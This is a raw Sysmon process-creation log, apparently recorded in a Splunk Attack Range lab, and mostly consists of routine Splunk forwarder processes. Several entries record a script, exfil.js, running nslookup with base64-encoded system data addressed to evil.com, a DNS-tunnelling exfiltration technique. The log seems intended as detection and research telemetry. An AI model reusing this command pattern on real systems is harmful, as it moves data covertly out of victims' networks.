15:16:16.616{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd 
"C:\temp"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000067190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:16.096{A8622C2F-58C0-6078-F50D-00000000AE01}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067083Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:04.310{A8622C2F-58B4-6078-F40D-00000000AE01}3176C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58B4-6078-F20D-00000000AE01}5664C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= 
evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtg.tmp 2>&1 154100x800000000000000067072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:04.277{A8622C2F-58B4-6078-F20D-00000000AE01}5664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtg.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067046Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:02.110{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000067005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:52.602{A8622C2F-58A8-6078-F00D-00000000AE01}5084C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe 
/displaydnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-58A8-6078-EF0D-00000000AE01}5764C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:52.591{A8622C2F-58A8-6078-EF0D-00000000AE01}5764C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:43.814{A8622C2F-589F-6078-EE0D-00000000AE01}5840C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /flushdnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-589F-6078-ED0D-00000000AE01}1348C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:15:43.803{A8622C2F-589F-6078-ED0D-00000000AE01}1348C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:24.461{A8622C2F-588C-6078-EC0D-00000000AE01}5872C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /displaydnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-588C-6078-EB0D-00000000AE01}5368C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:24.390{A8622C2F-588C-6078-EB0D-00000000AE01}5368C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000066827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:22.265{A8622C2F-588A-6078-EA0D-00000000AE01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066813Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:20.625{A8622C2F-5888-6078-E90D-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066801Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:19.961{A8622C2F-5887-6078-E80D-00000000AE01}6456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000066792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:19.294{A8622C2F-5887-6078-E70D-00000000AE01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:17.589{A8622C2F-5885-6078-E60D-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:16.907{A8622C2F-5884-6078-E50D-00000000AE01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:15:16.241{A8622C2F-5884-6078-E40D-00000000AE01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:22.254{A8622C2F-584E-6078-E30D-00000000AE01}2952C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000066551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:20.641{A8622C2F-584C-6078-E20D-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066541Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:19.953{A8622C2F-584B-6078-E10D-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066529Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:19.277{A8622C2F-584B-6078-E00D-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:17.665{A8622C2F-5849-6078-DF0D-00000000AE01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:16.998{A8622C2F-5848-6078-DE0D-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000066494Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:14:16.330{A8622C2F-5848-6078-DD0D-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066265Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:40.440{A8622C2F-5824-6078-DB0D-00000000AE01}6968C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\drivers\etc\hosts"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000066200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:22.248{A8622C2F-5812-6078-DA0D-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066188Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:20.563{A8622C2F-5810-6078-D90D-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:19.942{A8622C2F-580F-6078-D80D-00000000AE01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066166Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:13:19.276{A8622C2F-580F-6078-D70D-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:17.618{A8622C2F-580D-6078-D60D-00000000AE01}6824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:16.982{A8622C2F-580C-6078-D50D-00000000AE01}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000066122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:13:16.331{A8622C2F-580C-6078-D40D-00000000AE01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000065897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:12:22.251{A8622C2F-57D6-6078-D20D-00000000AE01}5200C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
